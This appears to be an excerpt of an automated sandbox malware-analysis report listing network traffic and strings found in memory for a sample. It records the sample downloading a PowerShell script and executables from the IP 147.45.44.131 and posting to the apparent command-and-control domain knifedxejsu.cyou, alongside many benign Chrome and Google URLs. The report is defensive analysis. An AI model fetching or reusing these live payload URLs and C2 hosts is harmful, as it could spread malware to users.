      Source: global trafficHTTP traffic detected: GET /infopage/bhdh552.ps1 HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: 147.45.44.131Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /infopage/hdt.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqHost: 147.45.44.131
      Source: global trafficHTTP traffic detected: GET /infopage/tbg9.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqHost: 147.45.44.131
      Source: global trafficHTTP traffic detected: GET /r/r1.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
      Source: chrome.exe, 00000008.00000002.2133393957.000009B400940000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
      Source: chrome.exe, 00000008.00000002.2133393957.000009B400940000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
      Source: chrome.exe, 00000008.00000003.969800499.000009B400218000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.969742442.000009B40148C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends CrLitElement{constructor(){super(...arguments);this.url={url:""}}static get is(){return"ntp-doodle-share-dialog"}static get styles(){return getCss$1()}render(){return getHtml$1.bind(this)()}static get properties(){return{title:{type:String},url:{type:Object}}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.fire("share",channel)}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);let instance$2=null;function getCss(){return instance$2||(instance$2=[...[getCss$3()],css`:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#doodle{position:relative}#shareButton{background-color:var(--color-new-tab-page-doodle-share-button-background,none);border:none;height:32px;min-width:32px;padding:0;position:absolute;width:32px;bottom:0}:host-context([dir=ltr]) #shareButton{right:-40px}:host-context([dir=rtl]) #shareButton{left:-40px}#shareButtonIcon{width:18px;height:18px;margin:7px;vertical-align:bottom;mask-image:url(chro
      Source: chrome.exe, 00000008.00000003.969800499.000009B400218000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.969742442.000009B40148C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends CrLitElement{constructor(){super(...arguments);this.url={url:""}}static get is(){return"ntp-doodle-share-dialog"}static get styles(){return getCss$1()}render(){return getHtml$1.bind(this)()}static get properties(){return{title:{type:String},url:{type:Object}}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.fire("share",channel)}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);let instance$2=null;function getCss(){return instance$2||(instance$2=[...[getCss$3()],css`:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#doodle{position:relative}#shareButton{background-color:var(--color-new-tab-page-doodle-share-button-background,none);border:none;height:32px;min-width:32px;padding:0;position:absolute;width:32px;bottom:0}:host-context([dir=ltr]) #shareButton{right:-40px}:host-context([dir=rtl]) #shareButton{left:-40px}#shareButtonIcon{width:18px;height:18px;margin:7px;vertical-align:bottom;mask-image:url(chro
      Source: chrome.exe, 00000008.00000002.2137669235.000009B40110C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2132114432.000009B400728000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
      Source: chrome.exe, 00000008.00000002.2133393957.000009B400940000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
      Source: chrome.exe, 00000008.00000002.2137374756.000009B40109C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2130814925.000009B400320000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137669235.000009B40110C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
      Source: chrome.exe, 00000008.00000002.2133393957.000009B400940000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)
      Source: chrome.exe, 00000008.00000002.2141553304.000009B4018B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2140308644.000009B4014F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137669235.000009B40110C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
      Source: chrome.exe, 00000008.00000002.2140308644.000009B4014F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.htmlult equals www.youtube.com (Youtube)
      Source: chrome.exe, 00000008.00000002.2130814925.000009B400320000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: www.youtube.com:443 equals www.youtube.com (Youtube)
      Source: global trafficDNS traffic detected: DNS query: knifedxejsu.cyou
      Source: global trafficDNS traffic detected: DNS query: www.google.com
      Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: knifedxejsu.cyou
      Source: global trafficTCP traffic: 192.168.11.20:57324 -> 239.255.255.250:1900
      Source: global trafficTCP traffic: 192.168.11.20:57324 -> 239.255.255.250:1900
      Source: global trafficTCP traffic: 192.168.11.20:57324 -> 239.255.255.250:1900
      Source: global trafficTCP traffic: 192.168.11.20:57324 -> 239.255.255.250:1900
      Source: 7IXl1M9JGV.exe, 00000000.00000000.869251338.00007FF7D7803000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://147.45.44.131/infopage/bhdh552.ps1
      Source: chrome.exe, 00000008.00000002.2130656769.000009B40026C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://clients2.google.com/time/1/current
      Source: chrome.exe, 00000008.00000002.2133904022.000009B400A04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=128
      Source: chrome.exe, 00000008.00000002.2136867640.000009B400FAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.966655744.000009B400A84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crbug.com/941620
      Source: RegAsm.exe, 00000007.00000002.1061887586.0000000000B13000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2125456034.000001EE12302000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
      Source: chrome.exe, 00000008.00000002.2137331333.000009B401088000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
      Source: chrome.exe, 00000008.00000002.2137331333.000009B401088000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
      Source: RegAsm.exe, 00000007.00000002.1061887586.0000000000B13000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2125456034.000001EE12302000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
      Source: chrome.exe, 00000008.00000002.2133612138.000009B40099C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2132290116.000009B400778000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://developer.chrome.com/docs/extensions/how-to/distribute/install-extensions)
      Source: chrome.exe, 00000008.00000002.2134021100.000009B400A54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://dl.google.com/release2/chrome_component/acaldksiunzh56452py2db5mnbpa_120.0.6050.0/jamhcnnkihi
      Source: chrome.exe, 00000008.00000002.2129755685.000009B4000DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://dl.google.com/release2/chrome_component/acowdfe2t76yuidsex3ifs6nk3da_20241026.690810062.14/ob
      Source: chrome.exe, 00000008.00000002.2134021100.000009B400A54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://dl.google.com/release2/chrome_component/actfcfanl4hq5aaxnnweccjxua6q_2024.11.6.1/jflhchccmppk
      Source: chrome.exe, 00000008.00000002.2134021100.000009B400A54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://dl.google.com/release2/chrome_component/adrga7eefaxjfdmmgfkiaxjg4yjq_2024.7.12.235938/eeigpng
      Source: chrome.exe, 00000008.00000002.2134021100.000009B400A54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://dl.google.com/release2/chrome_component/cpx7rw4q3nwu7emczqf2w6cu7y_2023.3.30.1305/cocncanleaf
      Source: chrome.exe, 00000008.00000002.2129755685.000009B4000DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://dl.google.com/release2/chrome_component/cvde376f6tyxybuonyzcqfilye_2024.10.30.0/niikhdgajlphf
      Source: chrome.exe, 00000008.00000002.2134021100.000009B400A54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://dl.google.com/release2/chrome_component/cxxqn654fg7hzrcrrnqcniqqye_2024.10.11.1/kiabhabjdbkjd
      Source: chrome.exe, 00000008.00000002.2134021100.000009B400A54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://dl.google.com/release2/chrome_component/e6xlmsu5i2bokri3w4cyuhv4nq_2024.8.10.0/gonpemdgkjcecd
      Source: chrome.exe, 00000008.00000002.2134021100.000009B400A54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://dl.google.com/release2/chrome_component/p2zbkxfgkqyr6ljey2oe3bnzoy_2023.11.29.1201/ggkkehgbnf
      Source: chrome.exe, 00000008.00000002.2138838858.000009B4012CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://dns-tunnel-check.googlezip.net/connect
      Source: chrome.exe, 00000008.00000002.2130054872.000009B40015C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1546757959.000009B400D83000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2139462568.000009B4013B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvNzI0QUFXNV9zT2RvdUwy
      Source: chrome.exe, 00000008.00000002.2134021100.000009B400A54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjhkYWYwZDctOTExOS00
      Source: chrome.exe, 00000008.00000002.2134021100.000009B400A54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaldksiunzh56452py2db5mnbpa_120.0.6050.0
      Source: chrome.exe, 00000008.00000002.2129755685.000009B4000DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acowdfe2t76yuidsex3ifs6nk3da_20241026.690
      Source: chrome.exe, 00000008.00000002.2134021100.000009B400A54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/actfcfanl4hq5aaxnnweccjxua6q_2024.11.6.1/
      Source: chrome.exe, 00000008.00000002.2129755685.000009B4000DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/ad3skwo2srs5xchyxzz6ujgnedha_9.52.0/gcmjk
      Source: chrome.exe, 00000008.00000002.2129755685.000009B4000DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/cvde376f6tyxybuonyzcqfilye_2024.10.30.0/n
      Source: chrome.exe, 00000008.00000002.2134021100.000009B400A54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/cxxqn654fg7hzrcrrnqcniqqye_2024.10.11.1/k
      Source: chrome.exe, 00000008.00000002.2134021100.000009B400A54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/e6xlmsu5i2bokri3w4cyuhv4nq_2024.8.10.0/go
      Source: chrome.exe, 00000008.00000002.2134021100.000009B400A54000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2125456034.000001EE12302000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2126075591.000001EE1237A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1596047557.000001EE1A4A1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2124880454.000001EE12264000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2123959093.000001EE10F02000.00000004.00000020.00020000.00000000.sdmp, edb.log.14.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/imoffpf67hel7kbknqflao2oo4_1.0.2738.0/nei
      Source: chrome.exe, 00000008.00000002.2137331333.000009B401088000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
      Source: chrome.exe, 00000008.00000002.2137331333.000009B401088000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr306
      Source: chrome.exe, 00000008.00000003.972811086.000009B400510000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.970825869.000009B401604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.971217420.000009B400544000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.973480513.000009B400604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.973089654.000009B401804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.971344270.000009B401664000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.971109499.000009B401630000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.972963112.000009B400544000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/AUTHORS.txt
      Source: chrome.exe, 00000008.00000003.972811086.000009B400510000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.970825869.000009B401604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.971217420.000009B400544000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.973480513.000009B400604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.973089654.000009B401804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.971344270.000009B401664000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.971109499.000009B401630000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.972963112.000009B400544000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/CONTRIBUTORS.txt
      Source: chrome.exe, 00000008.00000003.972811086.000009B400510000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.970825869.000009B401604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.971217420.000009B400544000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.973480513.000009B400604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.973089654.000009B401804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.971344270.000009B401664000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.971109499.000009B401630000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.972963112.000009B400544000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/LICENSE.txt
      Source: chrome.exe, 00000008.00000003.972811086.000009B400510000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.970825869.000009B401604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.971217420.000009B400544000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.973480513.000009B400604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.973089654.000009B401804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.971344270.000009B401664000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.971109499.000009B401630000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.972963112.000009B400544000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/PATENTS.txt
      Source: chrome.exe, 00000008.00000002.2134021100.000009B400A54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://redirector.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjhkYWYwZDctOTExOS0
      Source: chrome.exe, 00000008.00000002.2137331333.000009B401088000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
      Source: chrome.exe, 00000008.00000002.2135517261.000009B400DC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://unisolated.invalid/
      Source: chrome.exe, 00000008.00000002.2134021100.000009B400A54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/dl/release2/chrome_component/acaldksiunzh56452py2db5mnbpa_120.0.6050.0/jamhcnn
      Source: chrome.exe, 00000008.00000002.2129755685.000009B4000DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/dl/release2/chrome_component/acowdfe2t76yuidsex3ifs6nk3da_20241026.690810062.1
      Source: chrome.exe, 00000008.00000002.2134021100.000009B400A54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/dl/release2/chrome_component/actfcfanl4hq5aaxnnweccjxua6q_2024.11.6.1/jflhchcc
      Source: chrome.exe, 00000008.00000002.2134021100.000009B400A54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/dl/release2/chrome_component/adrga7eefaxjfdmmgfkiaxjg4yjq_2024.7.12.235938/eei
      Source: chrome.exe, 00000008.00000002.2134021100.000009B400A54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/dl/release2/chrome_component/cpx7rw4q3nwu7emczqf2w6cu7y_2023.3.30.1305/cocncan
      Source: chrome.exe, 00000008.00000002.2129755685.000009B4000DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/dl/release2/chrome_component/cvde376f6tyxybuonyzcqfilye_2024.10.30.0/niikhdgaj
      Source: chrome.exe, 00000008.00000002.2129755685.000009B4000DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/dl/release2/chrome_component/cxxqn654fg7hzrcrrnqcniqqye_2024.10.11.1/kiabhabjd
      Source: chrome.exe, 00000008.00000002.2134021100.000009B400A54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/dl/release2/chrome_component/e6xlmsu5i2bokri3w4cyuhv4nq_2024.8.10.0/gonpemdgkj
      Source: chrome.exe, 00000008.00000002.2129755685.000009B4000DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/dl/release2/chrome_component/imoffpf67hel7kbknqflao2oo4_1.0.2738.0/neifaoindgg
      Source: chrome.exe, 00000008.00000002.2134021100.000009B400A54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/dl/release2/chrome_component/p2zbkxfgkqyr6ljey2oe3bnzoy_2023.11.29.1201/ggkkeh
      Source: chrome.exe, 00000008.00000002.2135770117.000009B400E0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.gstatic.com/generate_204
      Source: RegAsm.exe, 00000007.00000002.1061887586.0000000000B13000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2125456034.000001EE12302000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2125122119.000001EE12296000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
      Source: chrome.exe, 00000008.00000003.966714458.000009B400A94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137958094.000009B40116C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;dc_pre=CL6sqZyWpIgDFWU-RAgdUQci9A;src=2542116;type=cli
      Source: chrome.exe, 00000008.00000002.2134562051.000009B400BB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
      Source: chrome.exe, 00000008.00000003.1272121186.000009B401340000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2141351455.000009B401838000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://account.live.com
      Source: chrome.exe, 00000008.00000002.2134616236.000009B400BD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/Abuse?mkt=EN-US&uiflavor=web&client_id=1E000040382627&id=293577&lmif=40&abr
      Source: chrome.exe, 00000008.00000002.2130527345.000009B400254000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accountcapabilities-pa.googleapis.com/
      Source: chrome.exe, 00000008.00000002.2129411778.000009B400034000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accountcapabilities-pa.googleapis.com/v1/accountcapabilities:batchGet
      Source: chrome.exe, 00000008.00000002.2140871311.000009B401704000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2132114432.000009B400728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2141390711.000009B401848000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2132290116.000009B400778000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com
      Source: chrome.exe, 00000008.00000002.2140871311.000009B401704000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2130814925.000009B400320000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/
      Source: chrome.exe, 00000008.00000002.2130527345.000009B400254000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/AccountChooser
      Source: chrome.exe, 00000008.00000002.2130527345.000009B400254000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/AddSession
      Source: chrome.exe, 00000008.00000002.2130656769.000009B40026C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/GetCheckConnectionInfo
      Source: chrome.exe, 00000008.00000002.2130656769.000009B40026C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/ListAccounts?json=standard
      Source: chrome.exe, 00000008.00000002.2130527345.000009B400254000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/Logout
      Source: chrome.exe, 00000008.00000002.2130527345.000009B400254000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/RotateBoundCookies
      Source: chrome.exe, 00000008.00000002.2130527345.000009B400254000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/chrome/blank.html
      Source: chrome.exe, 00000008.00000002.2130656769.000009B40026C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/reauth/chromeos
      Source: chrome.exe, 00000008.00000002.2130656769.000009B40026C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/chrome/usermenu
      Source: chrome.exe, 00000008.00000002.2130656769.000009B40026C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/kidsignin/chromeos
      Source: chrome.exe, 00000008.00000002.2130656769.000009B40026C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/kidsignup/chromeos
      Source: chrome.exe, 00000008.00000002.2130656769.000009B40026C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/v2/chromeos
      Source: chrome.exe, 00000008.00000002.2130656769.000009B40026C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/windows
      Source: chrome.exe, 00000008.00000002.2130656769.000009B40026C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/xreauth/chrome
      Source: chrome.exe, 00000008.00000002.2130656769.000009B40026C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/encryption/unlock/desktop
      Source: chrome.exe, 00000008.00000002.2129590881.000009B400094000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/encryption/unlock/desktop?kdi=CAIaDgoKY2hyb21lc3luYxAB
